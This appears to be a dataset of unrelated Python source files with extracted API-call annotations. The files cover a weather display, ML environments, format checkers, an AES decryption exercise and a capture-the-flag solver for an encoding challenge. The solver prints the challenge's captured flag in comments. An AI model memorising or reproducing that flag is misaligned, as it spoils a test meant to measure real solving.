    QFontDatabase.addApplicationFont(BASE_PATH + '/fonts/weather-icons/weathericons-regular-webfont.ttf')
    # Load weather icon map file (maps provider icon names to font glyphs)
    with open(BASE_PATH + '/icon-mapping.json') as file:
        icon_map = json.load(file)
    # Get weather forecast and conditions
    # NOTE(review): the API is queried even when --skip_weather is set;
    # the flag only skips populating the display below.
    weather = Weather(api_key=config['api_key'], city=config['city'], state=config['state'])
    conditions = weather.get_conditions()
    forecast = weather.get_forecast()
    # Get current time
    now = datetime.now()
    # Load display layout
    display = uic.loadUi(BASE_PATH + '/layout.ui')
    # Update the display with weather data
    if not config['skip_weather']:
        display.high.setText('{}\N{DEGREE SIGN}'.format(forecast[0]['high']['fahrenheit']))
        display.low.setText('{}\N{DEGREE SIGN}'.format(forecast[0]['low']['fahrenheit']))
        display.temp.setText('{:.0f}\N{DEGREE SIGN}'.format(conditions['temp_f']))
        display.feels_like.setText('Feels like {:.0f}\N{DEGREE SIGN}'.format(float(conditions['feelslike_f'])))
        display.cond.setText(icon_map[conditions['icon']])
        display.percip.setText('{}%'.format(forecast[0]['pop']))
        display.weekday.setText(now.strftime('%A'))
        display.date.setText(now.strftime('%B %d'))
        # One widget per day for the next four forecast days.
        for i in range(1, 5):
            day = uic.loadUi(BASE_PATH + '/day.ui')
            day.date.setText('{} {}'.format(forecast[i]['date']['weekday_short'].upper(), forecast[i]['date']['day']))
            day.cond.setText(icon_map[forecast[i]['icon']])
            day.high.setText('{}\N{DEGREE SIGN}'.format(forecast[i]['high']['fahrenheit']))
            day.low.setText('{}\N{DEGREE SIGN}'.format(forecast[i]['low']['fahrenheit']))
            day.percip.setText('{}%'.format(forecast[i]['pop']))
            display.forecast.addWidget(day)
    # Render to image
    img = QImage(display.size(), QImage.Format_RGB888)
    display.render(QPainter(img))
    if config['outfile']:
        # Save image to file
        img.save(config['outfile'])
    else:
        # Send to e-paper display (import here so the driver is only
        # needed on the device itself)
        from epd7in5 import EPD
        epd = EPD()
        epd.init()
        epd.display_qimage(img, BLACK, RED)
        epd.sleep()
# Script entry point.
if __name__ == '__main__':
    main()
| [
"argparse.ArgumentParser",
"PyQt5.uic.loadUi",
"json.load",
"datetime.datetime.now",
"weather.Weather",
"epd7in5.EPD",
"os.path.abspath"
] | [((234, 259), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (249, 259), False, 'import os\n'), ((413, 438), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (436, 438), False, 'import argparse\n'), ((1677, 1755), 'weather.Weather', 'Weather', ([], {'api_key': "config['api_key']", 'city': "config['city']", 'state': "config['state']"}), "(api_key=config['api_key'], city=config['city'], state=config['state'])\n", (1684, 1755), False, 'from weather import Weather\n'), ((1870, 1884), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1882, 1884), False, 'from datetime import datetime\n'), ((1926, 1962), 'PyQt5.uic.loadUi', 'uic.loadUi', (["(BASE_PATH + '/layout.ui')"], {}), "(BASE_PATH + '/layout.ui')\n", (1936, 1962), False, 'from PyQt5 import uic\n'), ((777, 792), 'json.load', 'json.load', (['file'], {}), '(file)\n', (786, 792), False, 'import json\n'), ((1604, 1619), 'json.load', 'json.load', (['file'], {}), '(file)\n', (1613, 1619), False, 'import json\n'), ((3494, 3499), 'epd7in5.EPD', 'EPD', ([], {}), '()\n', (3497, 3499), False, 'from epd7in5 import EPD\n'), ((2696, 2729), 'PyQt5.uic.loadUi', 'uic.loadUi', (["(BASE_PATH + '/day.ui')"], {}), "(BASE_PATH + '/day.ui')\n", (2706, 2729), False, 'from PyQt5 import uic\n')] |
from sklearn.metrics import r2_score

# Close predictions: r2 near 1.
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
r2 = r2_score(y_true, y_pred)
print(r2)

# Predictions far from the truth: large negative r2.
y_true = [5, 6, 7, 8]
y_pred = [-100, 524, -1, 3]
r2 = r2_score(y_true, y_pred)
print(r2)
# Bug fix: removed the stray bare token `r2_` that ended the script --
# it referenced an undefined name and raised NameError at runtime.
"sklearn.metrics.r2_score"
] | [((94, 118), 'sklearn.metrics.r2_score', 'r2_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (102, 118), False, 'from sklearn.metrics import r2_score\n'), ((177, 201), 'sklearn.metrics.r2_score', 'r2_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (185, 201), False, 'from sklearn.metrics import r2_score\n')] |
import pytest
from ssz.sedes import Bitvector
def test_bitvector_instantiation_bound():
    """A Bitvector must contain at least one bit."""
    zero_bits = 0
    with pytest.raises(ValueError):
        Bitvector(zero_bits)
| [
"ssz.sedes.Bitvector",
"pytest.raises"
] | [((100, 125), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (113, 125), False, 'import pytest\n'), ((157, 177), 'ssz.sedes.Bitvector', 'Bitvector', (['bit_count'], {}), '(bit_count)\n', (166, 177), False, 'from ssz.sedes import Bitvector\n')] |
# Computer Security
# encryption exercise
# <NAME> (42487)
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
# Load the AES key and IV written out by the companion encryption script.
with open('key.bin', 'rb') as k:
    key = k.read()
with open('vector.bin', 'rb') as v:
    init_vector = v.read()
cipher = AES.new(key, AES.MODE_CBC, init_vector)
with open('encrypted_file', 'rb') as encrypted:
    e_file = encrypted.read()
# strip() is used to remove the padding added during encryption.
# NOTE(review): bytes.strip() with no argument only removes ASCII
# whitespace bytes -- it is not a proper PKCS#7 unpad. Verify it matches
# the padding scheme used by the encryption script.
with open('decrypted_file.txt', 'wb') as decrypted:
    decrypted.write(cipher.decrypt(e_file).strip())
| [
"Crypto.Cipher.AES.new"
] | [((285, 324), 'Crypto.Cipher.AES.new', 'AES.new', (['key', 'AES.MODE_CBC', 'init_vector'], {}), '(key, AES.MODE_CBC, init_vector)\n', (292, 324), False, 'from Crypto.Cipher import AES\n')] |
from setuptools import setup
from setuptools import find_packages
# Third-party dependencies installed via install_requires below.
required_packages = [
    'beautifulsoup4',
    'cssselect',
    'duckling',
    'feedfinder2',
    'feedparser',
    'idna',
    'jieba3k',
    'JPype1',
    'Logbook',
    'lxml',
    'newspaper3k',
    'nltk',
    'Pillow',
    'PyQt5',
    'python-dateutil',
    'PyYAML',
    'requests',
    'requests-file',
    'sip',
    'six',
    'tldextract',
    'wit', ]
def readme():
    """Return the full text of README.md (relative to the current directory)."""
    with open('README.md') as readme_file:
        return readme_file.read()
# Package metadata; the `alfred` console script maps to alfred.__main__:main.
# NOTE(review): readme() above is defined but never wired to a
# long_description argument -- confirm whether that was intended.
setup(name='alfred',
      version='0.1',
      description='Modular Bot',
      url='https://github.com/Sefrwahed/Alfred',
      author='Sefrwahed',
      author_email='<EMAIL>',
      license='MIT',
      packages=find_packages(),
      include_package_data=True,
      install_requires=required_packages,
      entry_points={
          'console_scripts': [
              'alfred = alfred.__main__:main']},
      zip_safe=False, )
| [
"setuptools.find_packages"
] | [((725, 740), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (738, 740), False, 'from setuptools import find_packages\n')] |
from base64 import b64encode, b64decode
import binascii
from datetime import datetime
from uuid import UUID
from jsonschema._format import FormatChecker
from jsonschema.exceptions import FormatError
from six import binary_type, text_type, integer_types
# Feature flags for the optional date-time validation backends; flipped on
# below if the corresponding package imports successfully.
DATETIME_HAS_STRICT_RFC3339 = False
DATETIME_HAS_ISODATE = False
# Exception types that signal an invalid date-time for the active backend.
DATETIME_RAISES = ()
try:
    import isodate
except ImportError:
    pass
else:
    DATETIME_HAS_ISODATE = True
    DATETIME_RAISES += (ValueError, isodate.ISO8601Error)
try:
    import strict_rfc3339
except ImportError:
    pass
else:
    DATETIME_HAS_STRICT_RFC3339 = True
    DATETIME_RAISES += (ValueError, TypeError)
class StrictFormatChecker(FormatChecker):
    """FormatChecker variant that refuses to silently skip unknown formats."""

    def check(self, instance, format):
        # The stock FormatChecker ignores unregistered formats; here an
        # unknown format is an error.
        if format in self.checkers:
            return super(StrictFormatChecker, self).check(instance, format)
        raise FormatError(
            "Format checker for %r format not found" % (format, ))
# Shared checker instance; all the @checks registrations below attach to it.
oas30_format_checker = StrictFormatChecker()
@oas30_format_checker.checks('int32')
def is_int32(instance):
    """Accept any integer (via six.integer_types) for the ``int32`` format."""
    # NOTE(review): the 32-bit value range is not enforced here.
    return isinstance(instance, integer_types)
@oas30_format_checker.checks('int64')
def is_int64(instance):
    """Accept any integer (via six.integer_types) for the ``int64`` format."""
    # NOTE(review): the 64-bit value range is not enforced here.
    return isinstance(instance, integer_types)
@oas30_format_checker.checks('float')
def is_float(instance):
    """Accept a Python float for the ``float`` format."""
    return isinstance(instance, float)
@oas30_format_checker.checks('double')
def is_double(instance):
    """Accept a Python float for the ``double`` format."""
    # float has double precision in Python
    # It's double in CPython and Jython
    return isinstance(instance, float)
@oas30_format_checker.checks('binary')
def is_binary(instance):
    """Accept raw bytes (six.binary_type) for the ``binary`` format."""
    return isinstance(instance, binary_type)
@oas30_format_checker.checks('byte', raises=(binascii.Error, TypeError))
def is_byte(instance):
    """Validate that *instance* is base64-encoded content."""
    data = instance.encode() if isinstance(instance, text_type) else instance
    # Round trip: decoding then re-encoding must reproduce the input exactly.
    return b64encode(b64decode(data)) == data
@oas30_format_checker.checks("date-time", raises=DATETIME_RAISES)
def is_datetime(instance):
if isinstance(instance, binary_type):
return False
if not isinstance(instance, text_type):
return True
if DATETIME_HAS_STRICT_RFC3339:
return strict_rfc3339.validate_rfc3339(instance)
if DATETIME_HAS_ISODATE:
return isodate.parse_datetime(instance)
return True
@oas30_format_checker.checks("date", raises=ValueError)
def is_date(instance):
if isinstance(instance, binary_type):
return False
if not isinstance(instance, text_type):
return True
return datetime.strptime(instance, "%Y-%m-%d")
@oas30_format_checker.checks("uuid", raises=AttributeError)
def is_uuid(instance):
if isinstance(instance, binary_type):
return False
if not isinstance(instance, text_type):
return True
try:
uuid_obj = UUID(instance)
except ValueError:
return False
return text_type(uuid_obj) == instance
| [
"uuid.UUID",
"datetime.datetime.strptime",
"base64.b64decode",
"jsonschema.exceptions.FormatError",
"strict_rfc3339.validate_rfc3339",
"isodate.parse_datetime",
"six.text_type"
] | [((2494, 2533), 'datetime.datetime.strptime', 'datetime.strptime', (['instance', '"""%Y-%m-%d"""'], {}), "(instance, '%Y-%m-%d')\n", (2511, 2533), False, 'from datetime import datetime\n'), ((2134, 2175), 'strict_rfc3339.validate_rfc3339', 'strict_rfc3339.validate_rfc3339', (['instance'], {}), '(instance)\n', (2165, 2175), False, 'import strict_rfc3339\n'), ((2225, 2257), 'isodate.parse_datetime', 'isodate.parse_datetime', (['instance'], {}), '(instance)\n', (2247, 2257), False, 'import isodate\n'), ((2774, 2788), 'uuid.UUID', 'UUID', (['instance'], {}), '(instance)\n', (2778, 2788), False, 'from uuid import UUID\n'), ((2845, 2864), 'six.text_type', 'text_type', (['uuid_obj'], {}), '(uuid_obj)\n', (2854, 2864), False, 'from six import binary_type, text_type, integer_types\n'), ((786, 851), 'jsonschema.exceptions.FormatError', 'FormatError', (["('Format checker for %r format not found' % (format,))"], {}), "('Format checker for %r format not found' % (format,))\n", (797, 851), False, 'from jsonschema.exceptions import FormatError\n'), ((1823, 1842), 'base64.b64decode', 'b64decode', (['instance'], {}), '(instance)\n', (1832, 1842), False, 'from base64 import b64encode, b64decode\n')] |
#!/usr/bin/python3
import argparse
import socket
import base64
import binascii
# 'argparse' is a very useful library for building python tools that are easy
# to use from the command line. It greatly simplifies the input validation
# and "usage" prompts which really help when trying to debug your own code.
# parser = argparse.ArgumentParser(description="Solver for 'All Your Base' challenge")
# parser.add_argument("ip", help="IP (or hostname) of remote instance")
# parser.add_argument("port", type=int, help="port for remote instance")
# args = parser.parse_args()
# Remote challenge endpoint.
ip = 'challenge.acictf.com'
port = 47912

# This tells the computer that we want a new TCP "socket"
# NOTE(review): this rebinds the name `socket` from the module to the socket
# object, so the socket module's other attributes are shadowed afterwards.
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# This says we want to connect to the given IP and port
# socket.connect((args.ip, args.port))
socket.connect((ip, port))

# This gives us a file-like view of the connection which makes reading data
# easier since it handles the buffering of lines for you.
f = socket.makefile()

# while True:
#     line = f.readline().strip()
    # This iterates over data from the server a line at a time. This can cause
    # some unexpected behavior like not seeing "prompts" until after you've sent
    # a reply for it (for example, you won't see "answer:" for this problem).
    # However, you can still send data and it will be handled correctly.

    # Handle the information from the server to extact the problem and build
    # the answer string.
    # pass  # Fill this in with your logic

    # Send a response back to the server
    # answer = "Clearly not the answer..."
    # socket.send((answer + "\n").encode())  # The "\n" is important for the server's
                                     # interpretation of your answer, so make
                                     # sure there is only one sent for each
                                     # answer.
def raw_dec(x):
    """Interpret the ASCII string *x* as a single big-endian integer."""
    return int.from_bytes(x.encode(), byteorder='big')
def b64_dec(x):
    """Base64-decode *x*, then read the payload as a big-endian integer."""
    payload = base64.b64decode(x)
    return int.from_bytes(payload, byteorder='big')
def hex_dec(x):
    """Parse the string *x* as a base-16 number."""
    return int(x, 16)
def oct_dec(x):
    """Parse the string *x* as a base-8 number."""
    return int(x, 8)
def bin_dec(x):
    """Parse the string *x* as a base-2 number."""
    return int(x, 2)
def dec_raw(x):
    """Decode integer *x* back into the ASCII string it encodes.

    Fix: the previous version allocated ``bit_length()`` *bytes* (an 8x
    over-allocation padded with zeros) and then stripped NUL bytes from
    both ends, which would also destroy any genuine leading/trailing NUL
    bytes in the payload.  Allocating exactly ``(bit_length + 7) // 8``
    bytes needs no stripping and round-trips ``raw_dec`` faithfully.
    """
    value = int(x)  # accept ints or decimal strings, as before
    raw = value.to_bytes((value.bit_length() + 7) // 8, byteorder='big')
    return raw.decode()
def dec_b64(x):
    """Base64-encode the big-endian byte representation of integer *x*.

    Fix: the previous version called ``.strip(b'A')`` on the raw bytes
    before encoding, which removed literal 0x41 ('A') bytes from the ends
    of the payload and corrupted any value whose bytes begin or end with
    'A'.  ``to_bytes((bit_length + 7) // 8)`` already yields no zero
    padding, so nothing needs stripping.
    """
    raw = x.to_bytes((x.bit_length() + 7) // 8, byteorder='big')
    return base64.b64encode(raw).decode()
def dec_hex(x):
    """Render integer *x* as lowercase hex without the '0x' prefix."""
    prefixed = hex(x)
    return prefixed[2:]
def dec_oct(x):
    """Render integer *x* in octal without the '0o' prefix."""
    return oct(x)[2:]
def dec_bin(x):
    """Render integer *x* in binary without the '0b' prefix."""
    return bin(x)[2:]
# def read_to_dash():
# pass
# Skip the banner: read until the dashed separator line.
while True:
    line = f.readline().strip()
    if len(line) > 1 and line[0] == '-':
        break
# Main protocol loop: each round announces "<src_base> to <dst_base>",
# then sends the value to convert on the next line.
while True:
    line = f.readline().strip().split()
    print(line)
    encode = line[0]   # base the incoming value is written in
    decode = line[2]   # base the server expects the answer in
    print(encode, decode)
    src = f.readline().strip()
    print(src)
    # src to dec: normalise the input to a plain integer first.
    if encode == 'raw':
        dec = raw_dec(src)
    elif encode == 'b64':
        dec = b64_dec(src)
    elif encode == 'hex':
        dec = hex_dec(src)
    elif encode == 'dec':
        dec = int(src)
    elif encode == 'oct':
        dec = oct_dec(src)
    elif encode == 'bin':
        dec = bin_dec(src)
    # dec to target: re-encode the integer in the requested base.
    if decode == 'raw':
        target = dec_raw(dec)
    elif decode == 'b64':
        target = dec_b64(dec)
    elif decode == 'hex':
        target = dec_hex(dec)
    elif decode == 'dec':
        target = str(dec)
    elif decode == 'oct':
        target = dec_oct(dec)
    elif decode == 'bin':
        target = dec_bin(dec)
    # answer = "Clearly not the answer..."
    socket.send((target + "\n").encode())  # The "\n" is important for the server's
                                           # interpretation of your answer, so make
                                           # sure there is only one sent for each
                                           # answer.
    # Echo the server's verdict lines; on a wrong answer the flag line
    # never arrives, so flag it loudly and read one more line.
    line = f.readline().strip()
    print(line)
    line = f.readline().strip()
    print(line)
    line = f.readline().strip()
    print(line)
    if 'incorrect' in line:
        print('hold up')
        line = f.readline().strip()
        print(line)
# ACI{for_great_justice_618c35ec}
# ACI{for_great_justice_618c35ec}
| [
"socket.socket",
"socket.makefile",
"base64.b64encode",
"base64.b64decode",
"socket.connect"
] | [((680, 729), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (693, 729), False, 'import socket\n'), ((826, 852), 'socket.connect', 'socket.connect', (['(ip, port)'], {}), '((ip, port))\n', (840, 852), False, 'import socket\n'), ((992, 1009), 'socket.makefile', 'socket.makefile', ([], {}), '()\n', (1007, 1009), False, 'import socket\n'), ((2021, 2040), 'base64.b64decode', 'base64.b64decode', (['x'], {}), '(x)\n', (2037, 2040), False, 'import base64\n'), ((2521, 2541), 'base64.b64encode', 'base64.b64encode', (['by'], {}), '(by)\n', (2537, 2541), False, 'import base64\n')] |
import itertools
import os
import shutil
import numpy as np
import gym
from gym import spaces
import robosuite
from robosuite.controllers import load_controller_config
import robosuite.utils.macros as macros
import imageio, tqdm
from her import HERReplayBuffer
from tianshou.data import Batch
# Shorten the MuJoCo simulation timestep used by robosuite.
macros.SIMULATION_TIMESTEP = 0.02
# Print numpy arrays without scientific notation for readable logging.
np.set_printoptions(suppress=True)
class PushingEnvironment(gym.Env):
    """Gym wrapper around the robosuite "Push" task with a Panda arm.

    Observations are flat vectors of length 12 + 6 * num_obstacles
    (see `_get_flat_obs`); actions are 3-D end-effector position deltas
    (rotation components are zero-padded in `step`).
    """

    def __init__(self, horizon, control_freq, num_obstacles=0, renderable=False):
        """Build the underlying robosuite environment.

        :param horizon: episode length in environment steps
        :param control_freq: control frequency passed to robosuite
        :param num_obstacles: number of obstacle objects in the scene
        :param renderable: enable offscreen rendering / camera observations
        """
        self.num_obstacles = num_obstacles
        self.renderable = renderable
        self.env = robosuite.make(
            "Push",
            robots=["Panda"],
            controller_configs=load_controller_config(default_controller="OSC_POSE"),
            has_renderer=False,
            has_offscreen_renderer=renderable,
            render_visual_mesh=renderable,
            render_collision_mesh=False,
            camera_names=["agentview"] if renderable else None,
            control_freq=control_freq,
            horizon=horizon,
            use_object_obs=True,
            use_camera_obs=renderable,
            hard_reset=False,
            num_obstacles=num_obstacles,
        )
        # Only the 3 positional components of the OSC_POSE action space
        # are exposed; rotation is fixed (zero-padded in step()).
        low, high = self.env.action_spec
        self.action_space = spaces.Box(low=low[:3], high=high[:3])
        self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=[12 + 6 * num_obstacles])
        self.curr_obs = None
        self.step_num = None

    def seed(self, seed=None):
        """Seed numpy's global RNG and the action space sampler."""
        if seed is not None:
            np.random.seed(seed)
            self.action_space.seed(seed)

    def _get_flat_obs(self, obs):
        """Flatten a robosuite observation dict into a 1-D vector.

        Layout: eef pos (3), gripper->cube (3), gripper->goal (3),
        cube->goal (3), then interleaved (gripper->obstacle_i,
        cube->obstacle_i) pairs for each obstacle.
        """
        return np.concatenate([
            obs["robot0_eef_pos"],
            obs["gripper_to_cube_pos"],
            obs["gripper_to_goal_pos"],
            obs["cube_to_goal_pos"],
        ] + list(itertools.chain.from_iterable(zip(
            [obs[f"gripper_to_obstacle{i}_pos"] for i in range(self.num_obstacles)],
            [obs[f"cube_to_obstacle{i}_pos"] for i in range(self.num_obstacles)]
        ))))

    def reset(self):
        """Reset the underlying env and return the flat observation."""
        self.curr_obs = self.env.reset()
        self.step_num = 0
        return self._get_flat_obs(self.curr_obs)

    def step(self, action):
        """Apply a 3-D positional action (rotation zero-padded).

        Adds rendering metadata to `info` when renderable; marks every
        `done` as a time-limit truncation.
        """
        next_obs, reward, done, info = self.env.step(np.concatenate([action, [0, 0, 0]]))
        info["TimeLimit.truncated"] = done
        return_obs = self._get_flat_obs(next_obs)
        if self.renderable:
            # Image of the state the action was taken *from*.
            info["image"] = self.curr_obs["agentview_image"][::-1]
            info["step"] = self.step_num
            if done:
                info["final_image"] = next_obs["agentview_image"][::-1]
        self.curr_obs = next_obs
        self.step_num += 1
        return return_obs, reward, done, info

    def her(self, obs, obs_next):
        """
        Takes a list of observations (and next observations) from an entire episode and returns
        the HER-modified version of the episode in the form of 4 lists: (obs, obs_next, reward, done).

        The final cube position of the episode is substituted as a fake
        goal and the goal-relative observation components are recomputed.
        NOTE(review): the slice `9:` rewrites everything past column 9
        with a 3-wide value, which only matches the layout when
        num_obstacles == 0 — confirm her() is never used with obstacles.
        """
        obs = np.array(obs)
        obs_next = np.array(obs_next)
        # final cube position
        fake_goal = obs_next[-1, :3] - obs_next[-1, 3:6]
        # gripper to goal pos
        obs[:, 6:9] = obs[:, :3] - fake_goal
        obs_next[:, 6:9] = obs_next[:, :3] - fake_goal
        # cube to goal pos
        obs[:, 9:] = (obs[:, :3] - obs[:, 3:6]) - fake_goal
        obs_next[:, 9:] = (obs_next[:, :3] - obs_next[:, 3:6]) - fake_goal
        rewards = [self.env.compute_reward(fake_goal, on[:3] - on[3:6], {}) for on in obs_next]
        # rewards = []
        # for on in obs_next:
        #     reward = self.compute_reward(fake_goal, on[:3] - on[3:6], {})
        #     rewards.append(reward)
        #     if reward == 0:
        #         break
        dones = np.full_like(rewards, False, dtype=bool)
        dones[-1] = True
        infos = {
            "TimeLimit.truncated": dones.copy()
        }
        return obs[:len(rewards)], obs_next[:len(rewards)], np.array(rewards), dones, infos

    def render(self, mode="human"):
        """Return the current agentview frame (flipped right side up)."""
        assert self.renderable
        return self.curr_obs["agentview_image"][::-1]
if __name__ == "__main__":
    # Demo/debug driver: roll random actions and dump frames to ./render.
    # NOTE(review): rmtree fails if ./render does not exist yet.
    shutil.rmtree("render")
    os.makedirs("render")
    env = PushingEnvironment(1, 2, 10, renderable=True)
    env.seed(0)
    # buf = HERReplayBuffer(env, total_size=20, buffer_num=1)
    obs = env.reset()
    # for i in range(3):
    #     buf.add(Batch(
    #         obs=[obs],
    #         obs_next=[obs],
    #         act=[[0, 0, 0]],
    #         rew=[-100],
    #         done=[False if i < 2 else True]
    #     ))
    # actions = [[0, 0, 1]] * 2 + [[0, -1, 0]] * 2 + [[1, 0, -1]] * 2 + [[0, 1, 0]] * 3\
    #           + [[0, 0, 0]] * 2 + [[1, 0, 0]] * 2 + [[0, 1, -1]] + [[-1, 0, 0]] * 4
    for i in tqdm.tqdm(range(300)):
        # print(env.env.robots[0]._joint_positions)
        img = env.render()
        imageio.imwrite(f"render/{i:03}.png", img)
        obs_next, rew, done, _ = env.step(env.action_space.sample())
        # if i == 17:
        #     done = True
        # buf.add(Batch(
        #     obs=[obs],
        #     obs_next=[obs_next],
        #     act=[actions[i]],
        #     rew=[rew],
        #     done=[done]
        # ))
        obs = obs_next
        if done:
            # env.seed(i // 30 + 10)
            env.reset()
| [
"robosuite.controllers.load_controller_config",
"numpy.full_like",
"os.makedirs",
"imageio.imwrite",
"gym.spaces.Box",
"numpy.array",
"numpy.random.seed",
"numpy.concatenate",
"shutil.rmtree",
"numpy.set_printoptions"
] | [((331, 365), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (350, 365), True, 'import numpy as np\n'), ((4148, 4171), 'shutil.rmtree', 'shutil.rmtree', (['"""render"""'], {}), "('render')\n", (4161, 4171), False, 'import shutil\n'), ((4176, 4197), 'os.makedirs', 'os.makedirs', (['"""render"""'], {}), "('render')\n", (4187, 4197), False, 'import os\n'), ((1254, 1292), 'gym.spaces.Box', 'spaces.Box', ([], {'low': 'low[:3]', 'high': 'high[:3]'}), '(low=low[:3], high=high[:3])\n', (1264, 1292), False, 'from gym import spaces\n'), ((1327, 1395), 'gym.spaces.Box', 'spaces.Box', ([], {'low': '(-np.inf)', 'high': 'np.inf', 'shape': '[12 + 6 * num_obstacles]'}), '(low=-np.inf, high=np.inf, shape=[12 + 6 * num_obstacles])\n', (1337, 1395), False, 'from gym import spaces\n'), ((2996, 3009), 'numpy.array', 'np.array', (['obs'], {}), '(obs)\n', (3004, 3009), True, 'import numpy as np\n'), ((3029, 3047), 'numpy.array', 'np.array', (['obs_next'], {}), '(obs_next)\n', (3037, 3047), True, 'import numpy as np\n'), ((3759, 3799), 'numpy.full_like', 'np.full_like', (['rewards', '(False)'], {'dtype': 'bool'}), '(rewards, False, dtype=bool)\n', (3771, 3799), True, 'import numpy as np\n'), ((4867, 4909), 'imageio.imwrite', 'imageio.imwrite', (['f"""render/{i:03}.png"""', 'img'], {}), "(f'render/{i:03}.png', img)\n", (4882, 4909), False, 'import imageio, tqdm\n'), ((1527, 1547), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1541, 1547), True, 'import numpy as np\n'), ((2259, 2294), 'numpy.concatenate', 'np.concatenate', (['[action, [0, 0, 0]]'], {}), '([action, [0, 0, 0]])\n', (2273, 2294), True, 'import numpy as np\n'), ((3961, 3978), 'numpy.array', 'np.array', (['rewards'], {}), '(rewards)\n', (3969, 3978), True, 'import numpy as np\n'), ((681, 734), 'robosuite.controllers.load_controller_config', 'load_controller_config', ([], {'default_controller': '"""OSC_POSE"""'}), "(default_controller='OSC_POSE')\n", 
(703, 734), False, 'from robosuite.controllers import load_controller_config\n')] |
import unittest
import acpc_python_client as acpc
from tools.constants import Action
from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType
from tools.io_util import read_strategy_from_file
from evaluation.exploitability import Exploitability
from tools.game_utils import is_strategies_equal, is_correct_strategy
KUHN_POKER_GAME_FILE_PATH = 'games/kuhn.limit.2p.game'
LEDUC_POKER_GAME_FILE_PATH = 'games/leduc.limit.2p.game'
class WeakAgentsTests(unittest.TestCase):
    """Sanity and exploitability checks for action-tilted weak agents."""

    def _train_tilt(self, game_file, action, tilt_type, probability, iterations):
        """Train a tilted strategy from scratch with a short CFR run."""
        return create_agent_strategy(
            game_file,
            action,
            tilt_type,
            probability,
            cfr_iterations=iterations,
            cfr_weight_delay=2,
            show_progress=False)

    def test_kuhn_action_tilted_agent_not_crashing(self):
        tilted = self._train_tilt(
            KUHN_POKER_GAME_FILE_PATH, Action.RAISE, TiltType.ADD, 0.2, 20)
        self.assertTrue(is_correct_strategy(tilted))

    def test_leduc_add_action_tilted_agent_not_crashing(self):
        tilted = self._train_tilt(
            LEDUC_POKER_GAME_FILE_PATH, Action.FOLD, TiltType.ADD, 0.1, 5)
        self.assertTrue(is_correct_strategy(tilted))

    def test_leduc_multiply_action_tilted_agent_not_crashing(self):
        tilted = self._train_tilt(
            LEDUC_POKER_GAME_FILE_PATH, Action.FOLD, TiltType.MULTIPLY, 0.1, 5)
        self.assertTrue(is_correct_strategy(tilted))

    def _check_kuhn_equilibrium_tilt(self, action, tilt_type, probability):
        """Tilt the Kuhn equilibrium and verify the tilt is more exploitable."""
        equilibrium, _ = read_strategy_from_file(
            KUHN_POKER_GAME_FILE_PATH,
            'strategies/kuhn.limit.2p-equilibrium.strategy')
        game = acpc.read_game_file(KUHN_POKER_GAME_FILE_PATH)
        exploitability = Exploitability(game)
        tilted = create_agent_strategy_from_trained_strategy(
            KUHN_POKER_GAME_FILE_PATH,
            equilibrium,
            action,
            tilt_type,
            probability)
        self.assertTrue(is_correct_strategy(tilted))
        self.assertTrue(not is_strategies_equal(equilibrium, tilted))
        base_value = exploitability.evaluate(equilibrium)
        tilted_value = exploitability.evaluate(tilted)
        self.assertTrue(tilted_value > base_value)

    def test_kuhn_action_tilted_agent(self):
        self._check_kuhn_equilibrium_tilt(Action.RAISE, TiltType.ADD, 0.2)

    def test_kuhn_action_minus_tilted_agent(self):
        self._check_kuhn_equilibrium_tilt(Action.CALL, TiltType.ADD, -0.5)
| [
"tools.io_util.read_strategy_from_file",
"weak_agents.action_tilted_agent.create_agent_strategy",
"tools.game_utils.is_correct_strategy",
"acpc_python_client.read_game_file",
"tools.game_utils.is_strategies_equal",
"evaluation.exploitability.Exploitability",
"weak_agents.action_tilted_agent.create_agent... | [((616, 761), 'weak_agents.action_tilted_agent.create_agent_strategy', 'create_agent_strategy', (['KUHN_POKER_GAME_FILE_PATH', 'Action.RAISE', 'TiltType.ADD', '(0.2)'], {'cfr_iterations': '(20)', 'cfr_weight_delay': '(2)', 'show_progress': '(False)'}), '(KUHN_POKER_GAME_FILE_PATH, Action.RAISE, TiltType.ADD,\n 0.2, cfr_iterations=20, cfr_weight_delay=2, show_progress=False)\n', (637, 761), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((981, 1125), 'weak_agents.action_tilted_agent.create_agent_strategy', 'create_agent_strategy', (['LEDUC_POKER_GAME_FILE_PATH', 'Action.FOLD', 'TiltType.ADD', '(0.1)'], {'cfr_iterations': '(5)', 'cfr_weight_delay': '(2)', 'show_progress': '(False)'}), '(LEDUC_POKER_GAME_FILE_PATH, Action.FOLD, TiltType.ADD,\n 0.1, cfr_iterations=5, cfr_weight_delay=2, show_progress=False)\n', (1002, 1125), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((1350, 1500), 'weak_agents.action_tilted_agent.create_agent_strategy', 'create_agent_strategy', (['LEDUC_POKER_GAME_FILE_PATH', 'Action.FOLD', 'TiltType.MULTIPLY', '(0.1)'], {'cfr_iterations': '(5)', 'cfr_weight_delay': '(2)', 'show_progress': '(False)'}), '(LEDUC_POKER_GAME_FILE_PATH, Action.FOLD, TiltType.\n MULTIPLY, 0.1, cfr_iterations=5, cfr_weight_delay=2, show_progress=False)\n', (1371, 1500), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((1712, 1815), 'tools.io_util.read_strategy_from_file', 'read_strategy_from_file', 